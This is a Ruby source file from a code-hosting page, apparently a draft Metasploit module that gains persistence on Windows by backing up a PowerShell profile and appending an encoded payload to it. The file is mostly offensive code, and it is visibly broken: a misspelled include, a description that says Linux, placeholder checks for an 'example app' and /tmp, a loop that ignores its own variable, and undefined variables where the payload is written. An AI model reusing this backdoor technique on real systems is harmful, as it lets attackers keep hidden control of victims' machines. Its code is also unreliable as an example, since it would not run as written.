adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
f255fe398dc9ff62109f6584a213fb501ec521cd
metasploit-gs/modules/exploits/windows/persistence/powershell_profile.rb
T
madefourit f255fe398d update modules
2026-04-14 09:45:41 -04:00

118 lines
4.2 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
# includes writable?, upload_file, upload_and_chmodx, exploit_data
include Msf::Post::File
# includes pwsh
inlude Msft::Exploit::Powershell
# includes generate_payload_exe
include Msf::Exploit::EXE
# defines install_persistence and does our cleanup
# WritableDir
include Msf::Exploit::Local::Persistence
# runs check automatically
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Powershell Profile Persistence',
'Description' => %q{
This exploit sample shows how a persistence module could be written
for a linux computer.
},
'License' => MSF_LICENSE,
'Author' => [
'madefourit'
],
'Platform' => [ 'win' ],
'Arch' => [ ARCH_CMD ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'References' => [
['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
['ATT&CK', Mitre::Attack::Technique::T1546_013_POWERSHELL_PROFILE],
[ 'URL', 'https://pentestlab.blog/2019/11/05/persistence-powershell-profile/']
],
'DisclosureDate' => '2019-11-05',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
}
)
)
# options
register_options [
OptEnum.new('PROFILE', [true, 'The powershell profile to target.', 'AUTO', ['AUTO', 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST']])
]
# force exploit is used to bypass the check command results
register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
]
end
def check
# Check a example app is installed
print_warning('Payloads in /tmp will only last until reboot, you may want to choose elsewhere.') if writable_dir.start_with?('/tmp')
return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
return CheckCode::Safe("#{writable_dir} isnt writable") unless writable?(writable_dir)
return CheckCode::Safe('example app is required') unless command_exists?('example')
CheckCode::Detected('example app is installed')
end
#
# The install_persistence method installs the persistence, starts the handler, and does all
# the main activities
#
def backdoor_profile(profile_file)
unless readable?(profile_file)
print_error("#{profile_file} can not be read")
return
end
pfile = read_file(profile_file)
backup_file = store_loot(
'powershell.profile',
'text/plain',
session,
pfile, profile_file.split('\\').last,
'powershell profile backup'
)
print_status("Created #{profile_file} backup: #{backup_file}")
end
def install_persistence
profiles = JSON.parse(cmd_exec('$PROFILE | Select-Object * | ConvertTo-Json;'))
profiles.transform_keys { |k| k.upcase }
case datastore['PROFILE']
when 'AUTO'
['ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST'].each do |profile|
unless profiles.key?(datastore['PROFILE'])
print_error("#{datastore['PROFILE']} not found in user's profiles")
return
end
success = backdoor_profile(profiles[datastore['PROFILE']])
return if success
end
when 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS','CURRENTUSERCURRENTHOST'
unless profiles.key?(datastore['PROFILE'])
print_error("#{datastore['PROFILE']} not found in user's profiles")
return
end
backdoor_profile(profiles[datastore['PROFILE']])
append_file(profile_file, "\n#{payload.encoded}")
@clean_up_rc << "upload #{backup_file} #{profile_file}\n"
end
end
end
Reference in New Issue View Git Blame Copy Permalink